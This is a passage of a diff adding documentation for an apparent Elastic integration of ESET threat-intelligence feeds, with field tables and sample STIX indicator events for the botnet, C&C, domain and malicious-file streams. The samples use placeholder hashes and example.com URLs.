| match_only_text | + + +An example event for `botnet` looks as following: + +```json +{ + "@timestamp": "2023-10-18T02:05:09.000Z", + "agent": { + "ephemeral_id": "29211d59-f061-4b27-a169-6db0193f8177", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.botnet", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--80dc09fa-563f-4a9c-ad1d-655d8dffa37f", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-20T02:05:09.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:18:01.686Z", + "dataset": "ti_eset.botnet", + "ingested": "2024-03-27T14:18:13Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-10-18T02:05:09.000Z\",\"description\":\"Each of these file hashes indicates that a variant of Win32/Rescoms.B backdoor is present.\",\"id\":\"indicator--80dc09fa-563f-4a9c-ad1d-655d8dffa37f\",\"labels\":[\"malicious-activity\"],\"modified\":\"2023-10-18T02:05:09.000Z\",\"name\":\"373d34874d7bc89fd4cefa6272ee80bf\",\"pattern\":\"[file:hashes.'SHA-256'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7'] OR [file:hashes.'SHA-1'='373d34874d7bc89fd4cefa6272ee80bf'] OR [file:hashes.'MD5'='373d34874d7bc89fd4cefa6272ee80bf']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-10-18T02:05:09Z\",\"valid_until\":\"2023-10-20T02:05:09Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-botnet" + ], + "threat": { + "feed": { + "name": "ESET Botnet stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": 
"Each of these file hashes indicates that a variant of Win32/Rescoms.B backdoor is present.", + "file": { + "hash": { + "md5": "373d34874d7bc89fd4cefa6272ee80bf", + "sha1": "373d34874d7bc89fd4cefa6272ee80bf", + "sha256": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7" + } + }, + "last_seen": "2023-10-18T02:05:09.000Z", + "modified_at": "2023-10-18T02:05:09.000Z", + "name": "373d34874d7bc89fd4cefa6272ee80bf", + "provider": "eset", + "type": "file" + } + } +} +``` + +### C&C + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host is running. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container id. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. 
When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.message | Error message. | match_only_text | +| eset.id | The UID of the event object. | keyword | +| eset.labels | Threat labels. | keyword | +| eset.valid_until | Event expiration date. | date | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. 
| date | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | +| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | +| host.ip | Host ip addresses. | ip | +| host.mac | Host mac addresses. | keyword | +| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. 
The sender decides which value to use. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. | keyword | +| host.os.name.text | Multi-field of `host.os.name`. | text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.version | Operating system version as a raw string. | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | +| input.type | Input type. | keyword | +| labels.is_ioc_transform_source | Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. | constant_keyword | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | +| tags | List of keywords used to tag each event. | keyword | +| threat.feed.name | The name of the threat feed in UI friendly format. | keyword | +| threat.indicator.confidence | Identifies the vendor-neutral confidence rating using the None/Low/Medium/High scale defined in Appendix A of the STIX 2.1 framework. Vendor-specific confidence scales may be added as custom fields. | keyword | +| threat.indicator.description | Describes the type of action conducted by the threat. 
| keyword | +| threat.indicator.last_seen | The date and time when intelligence source last reported sighting this indicator. | date | +| threat.indicator.modified_at | The date and time when intelligence source last modified information for this indicator. | date | +| threat.indicator.name | The display name indicator in an UI friendly format URL, IP address, email address, registry key, port number, hash value, or other relevant name can serve as the display name. | keyword | +| threat.indicator.provider | The name of the indicator's provider. | keyword | +| threat.indicator.type | Type of indicator as represented by Cyber Observable in STIX 2.0. | keyword | +| threat.indicator.url.original | Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. | wildcard | +| threat.indicator.url.original.text | Multi-field of `threat.indicator.url.original`. 
| match_only_text | + + +An example event for `cc` looks as following: + +```json +{ + "@timestamp": "2023-10-19T02:00:09.000Z", + "agent": { + "ephemeral_id": "f8b54ae9-959e-4ef4-b706-1bea093aaf7e", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.cc", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--34e0eaa0-d35d-4039-b801-8f05d4e16bea", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-21T02:00:09.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:19:06.534Z", + "dataset": "ti_eset.cc", + "ingested": "2024-03-27T14:19:18Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-10-19T02:00:09.000Z\",\"description\":\"C\\u0026C of Win32/Smokeloader.H trojan\",\"id\":\"indicator--34e0eaa0-d35d-4039-b801-8f05d4e16bea\",\"labels\":[\"malicious-activity\"],\"modified\":\"2023-10-19T02:00:09.000Z\",\"name\":\"https://example.com/some/path\",\"pattern\":\"[url:value='https://example.com/some/path']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-10-19T02:00:09Z\",\"valid_until\":\"2023-10-21T02:00:09Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-cc" + ], + "threat": { + "feed": { + "name": "ESET Botnet C&C stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C of Win32/Smokeloader.H trojan", + "last_seen": "2023-10-19T02:00:09.000Z", + "modified_at": "2023-10-19T02:00:09.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": 
"https://example.com/some/path" + } + } + } +} +``` + +### Domains + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host is running. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container id. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.message | Error message. | match_only_text | +| eset.id | The UID of the event object. | keyword | +| eset.labels | Threat labels. | keyword | +| eset.valid_until | Event expiration date. 
| date | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. 
The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | +| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | +| host.ip | Host ip addresses. | ip | +| host.mac | Host mac addresses. | keyword | +| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. 
| keyword | +| host.os.name.text | Multi-field of `host.os.name`. | text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.version | Operating system version as a raw string. | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | +| input.type | Input type. | keyword | +| labels.is_ioc_transform_source | Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. | constant_keyword | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | +| tags | List of keywords used to tag each event. | keyword | +| threat.feed.name | The name of the threat feed in UI friendly format. | keyword | +| threat.indicator.confidence | Identifies the vendor-neutral confidence rating using the None/Low/Medium/High scale defined in Appendix A of the STIX 2.1 framework. Vendor-specific confidence scales may be added as custom fields. | keyword | +| threat.indicator.description | Describes the type of action conducted by the threat. | keyword | +| threat.indicator.last_seen | The date and time when intelligence source last reported sighting this indicator. | date | +| threat.indicator.modified_at | The date and time when intelligence source last modified information for this indicator. 
| date | +| threat.indicator.name | The display name indicator in an UI friendly format URL, IP address, email address, registry key, port number, hash value, or other relevant name can serve as the display name. | keyword | +| threat.indicator.provider | The name of the indicator's provider. | keyword | +| threat.indicator.type | Type of indicator as represented by Cyber Observable in STIX 2.0. | keyword | +| threat.indicator.url.domain | Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. | keyword | +| threat.indicator.url.original | Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. | wildcard | +| threat.indicator.url.original.text | Multi-field of `threat.indicator.url.original`. 
| match_only_text | + + +An example event for `domains` looks as following: + +```json +{ + "@timestamp": "2023-10-19T02:00:28.000Z", + "agent": { + "ephemeral_id": "6f2d8296-ddcf-4634-867b-00b524eb387c", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.domains", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--dfb05726-f2be-43c8-a5b2-48e78cc05286", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-21T02:00:28.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:20:11.664Z", + "dataset": "ti_eset.domains", + "ingested": "2024-03-27T14:20:23Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-10-19T02:00:28.000Z\",\"description\":\"Host is known to be actively distributing adware or other medium-risk software.\",\"id\":\"indicator--dfb05726-f2be-43c8-a5b2-48e78cc05286\",\"labels\":[\"malicious-activity\"],\"modified\":\"2023-10-19T02:00:28.000Z\",\"name\":\"example.com\",\"pattern\":\"[domain-name:value='example.com']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-10-19T02:00:28Z\",\"valid_until\":\"2023-10-21T02:00:28Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-domains" + ], + "threat": { + "feed": { + "name": "ESET Domain stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Host is known to be actively distributing adware or other medium-risk software.", + "last_seen": "2023-10-19T02:00:28.000Z", + "modified_at": "2023-10-19T02:00:28.000Z", + "name": "example.com", + 
"provider": "eset", + "type": "url", + "url": { + "domain": "example.com", + "original": "example.com" + } + } + } +} +``` + +### Malicious files + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host is running. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container id. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.message | Error message. | match_only_text | +| eset.id | The UID of the event object. | keyword | +| eset.labels | Threat labels. 
| keyword | +| eset.valid_until | Event expiration date. | date | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. 
The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | +| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | +| host.ip | Host ip addresses. | ip | +| host.mac | Host mac addresses. | keyword | +| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. 
| keyword | +| host.os.name.text | Multi-field of `host.os.name`. | text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.version | Operating system version as a raw string. | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | +| input.type | Input type. | keyword | +| labels.is_ioc_transform_source | Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. | constant_keyword | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | +| tags | List of keywords used to tag each event. | keyword | +| threat.feed.name | The name of the threat feed in UI friendly format. | keyword | +| threat.indicator.confidence | Identifies the vendor-neutral confidence rating using the None/Low/Medium/High scale defined in Appendix A of the STIX 2.1 framework. Vendor-specific confidence scales may be added as custom fields. | keyword | +| threat.indicator.description | Describes the type of action conducted by the threat. | keyword | +| threat.indicator.file.hash.md5 | MD5 hash. | keyword | +| threat.indicator.file.hash.sha1 | SHA1 hash. | keyword | +| threat.indicator.file.hash.sha256 | SHA256 hash. | keyword | +| threat.indicator.last_seen | The date and time when intelligence source last reported sighting this indicator. | date | +| threat.indicator.modified_at | The date and time when intelligence source last modified information for this indicator. 
| date | +| threat.indicator.name | The display name indicator in an UI friendly format URL, IP address, email address, registry key, port number, hash value, or other relevant name can serve as the display name. | keyword | +| threat.indicator.provider | The name of the indicator's provider. | keyword | +| threat.indicator.type | Type of indicator as represented by Cyber Observable in STIX 2.0. | keyword | +| threat.indicator.url.original | Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. | wildcard | +| threat.indicator.url.original.text | Multi-field of `threat.indicator.url.original`. | match_only_text | + + +An example event for `files` looks as following: + +```json +{ + "@timestamp": "2023-10-19T02:00:38.000Z", + "agent": { + "ephemeral_id": "205a7540-b015-4c5a-9534-191e2f7c11f1", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.files", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--5d7e9ad6-7b48-42fa-8598-d474e8da1b0f", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-21T02:00:38.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:21:17.805Z", + "dataset": "ti_eset.files", + "ingested": "2024-03-27T14:21:29Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-10-19T02:00:38.000Z\",\"description\":\"Each of these file hashes indicates that a variant of HTML/Phishing.Agent.EVU trojan is 
present.\",\"id\":\"indicator--5d7e9ad6-7b48-42fa-8598-d474e8da1b0f\",\"labels\":[\"malicious-activity\"],\"modified\":\"2023-10-19T02:00:38.000Z\",\"name\":\"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\",\"pattern\":\"[file:hashes.'SHA-256'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7'] OR [file:hashes.'SHA-1'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7'] OR [file:hashes.'MD5'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-10-19T02:00:38Z\",\"valid_until\":\"2023-10-21T02:00:38Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-files" + ], + "threat": { + "feed": { + "name": "ESET Malicious Files stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of HTML/Phishing.Agent.EVU trojan is present.", + "file": { + "hash": { + "md5": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "sha1": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "sha256": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7" + } + }, + "last_seen": "2023-10-19T02:00:38.000Z", + "modified_at": "2023-10-19T02:00:38.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "provider": "eset", + "type": "file" + } + } +} +``` + +### IP + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host is running. 
| keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container id. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.message | Error message. | match_only_text | +| eset.id | The UID of the event object. | keyword | +| eset.labels | Threat labels. | keyword | +| eset.valid_until | Event expiration date. | date | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. 
| keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. 
